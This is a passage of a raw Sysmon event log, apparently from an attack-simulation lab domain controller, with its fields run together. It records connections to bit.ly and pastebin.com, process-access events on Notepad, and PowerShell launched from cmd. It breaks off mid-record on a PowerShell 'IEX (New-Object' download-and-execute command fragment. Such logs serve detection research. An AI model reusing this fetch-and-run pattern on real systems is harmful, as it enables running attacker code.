Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60187-false10.0.1.12-8000- 354300x80000000000000002244100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.241{00000000-0000-0000-0000-000000000000}4836<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60186-false104.23.99.190-443https 354300x80000000000000002244099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.213{00000000-0000-0000-0000-000000000000}4836<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60185-false104.23.99.190-80http 354300x80000000000000002244098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.195{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58587- 10341000x80000000000000002244097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.248{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+5d48a|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4B82) 10341000x80000000000000002244096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.248{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978) 10341000x80000000000000002244095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.248{05ADC7E1-6E39-603E-FCAA-00000000AD01}138409772C:\Windows\SYSTEM32\Notepad.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4B82) 22542200x80000000000000002244094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.213{00000000-0000-0000-0000-000000000000}4836pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;<unknown process> 22542200x80000000000000002244093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.106{00000000-0000-0000-0000-000000000000}4836bit.ly0::ffff:67.199.248.10;::ffff:67.199.248.11;<unknown process> 10341000x80000000000000002244092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.062{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.061{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.061{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002244089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:15.108{00000000-0000-0000-0000-000000000000}4836<unknown process>-tcptruefalse10.0.1.14win-dc-974.attackrange.local60184-false67.199.248.10bit.ly80http 10341000x80000000000000002244088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618015788C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618015788C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618015788C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244083Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618015788C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244082Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244081Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244080Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244079Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.045{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244078Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.029{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244077Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.014{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244076Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:26.014{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002244075Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:25.998{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=007DA2DA4EA4B2D824BBDCA13AC51E33,SHA256=604E45DC09E43827E4E2D222E8B6F1690C431AAC22F5AF83A0E942ADD6AC231C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.983{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nphdjf2c.np2.ps12021-03-02 16:56:27.983 10341000x80000000000000002244204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.967{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.938{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002244198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.920{05ADC7E1-6E3B-603E-FDAA-00000000AD01}137168588C:\Windows\system32\cmd.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002244196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:27.934{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowershell.exe "IEX (New-Object 